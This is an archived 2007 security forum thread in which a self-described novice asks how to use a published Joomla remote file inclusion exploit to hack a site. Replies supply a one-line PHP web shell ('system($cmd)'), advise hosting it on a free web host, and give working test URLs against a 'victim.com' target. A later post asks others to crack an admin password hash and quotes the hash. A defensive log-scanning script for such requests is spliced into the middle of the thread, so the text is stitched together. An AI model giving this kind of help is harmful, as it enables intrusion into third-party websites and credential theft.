IT Security and Insecurity Portal

Joomla hack, help

Posted: Fri Dec 28, 2007 8:49 am
sran20
Regular user
Joined: Oct 24, 2007
Posts: 5

Hello,
I would like to hack a Joomla with http://www.milw0rm.com/exploits/4783
but I do not understand what the =http://shell.txt? is.
Can you tell me what I can do with =http://shell.txt?
Sorry for my English

Posted: Fri Dec 28, 2007 10:09 am
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria

http://shell.txt? is the path to your eval code. Something like this: <? system($cmd) ?> Make an account at freewebs.com and upload the code.

Posted: Fri Dec 28, 2007 10:17 am
sran20
Regular user
Joined: Oct 24, 2007
Posts: 5

Can someone give me eval code for a hack to get the admin id for Joomla, please, because I do not know eval coding.

Posted: Fri Dec 28, 2007 4:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

What are your intentions? What do you mean by "hacking"? Do you want to deface the website? Destroy it? Or just steal usernames and password hashes? Or just have some fun? Or hack in and use it as a proxy or bouncer for other hacks? Rooting the webserver? Because it seems to me that you are an absolute beginner, and it's interesting to know what you want to do with this exploit ...
Now, make this test first:
Code:
http://victim.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.yahoo.com

If you see the yahoo page within the target page, then the target is vulnerable.
You can try other URLs too. If you are able to remotely include the stuff from other websites, then this exploit is working. If not, then the target is patched or something else is wrong.
[[EDIT]]
I was testing this vulnerability and this is the working test:
Code:
http://victim.com/components/com_directory/modules/mod_pxt_latest.php?mosConfig_absolute_path=http://www.yahoo.com/?xxx=

If you see yahoo content, then further exploiting is possible.
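
Seen from the defending side, the test requests in the post above leave a recognisable trace in the web server access log: a query parameter whose value is a remote URL. The following is an added example, not part of the original thread, that flags such requests; the log lines, hosts and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# client, request target and status from a common/combined-format log line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# a parameter value that starts with a remote scheme
REMOTE_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# parameter names taken from the two test URLs in the thread
KNOWN_PARAMS = {"mosconfig_absolute_path", "globals[mosconfig_absolute_path]"}

# Constructed sample log lines (documentation IPs and hosts, not real traffic)
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Dec/2007:16:29:01 +0000] "GET /components/com_directory/modules/'
    'mod_pxt_latest.php?mosConfig_absolute_path=http://remote.example/?xxx= HTTP/1.1" 200 5120',
    '203.0.113.7 - - [28/Dec/2007:16:29:09 +0000] "GET /components/com_directory/modules/'
    'mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http%253A%252F%252Fremote.example%252F'
    ' HTTP/1.1" 404 312',
    '198.51.100.4 - - [28/Dec/2007:16:30:00 +0000] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 8192',
    '198.51.100.9 - - [28/Dec/2007:16:31:00 +0000] "GET /index.php?return=HTTPS://other.example/ HTTP/1.1" 302 0',
]


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (%253A -> %3A -> :) used to dodge filters."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_lines):
    """Return (client, param, value, status, severity) for each suspicious parameter."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = decode_fully(value)
            if not REMOTE_RE.match(value):
                continue
            # Other parameters may be legitimate redirects, so they are only queued for review.
            known = decode_fully(name).lower() in KNOWN_PARAMS
            hits.append((client, name, value, status, "high" if known else "review"))
    return hits
```

A 200 status on a flagged request does not by itself show that the include succeeded; correlate hits with outbound connections made by the web server at the same time.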

Posted: Mon Feb 04, 2008 5:23 pm
alibaba5
Beginner
Joined: Feb 03, 2008
Posts: 3

Hi,
I have a Joomla salted hash.
Can someone crack that?
admin:ed6f84c5e84b0f299038dd86bbb78653:G6zMb6xeP1ORIpQC
Thanks in advance

All times are GMT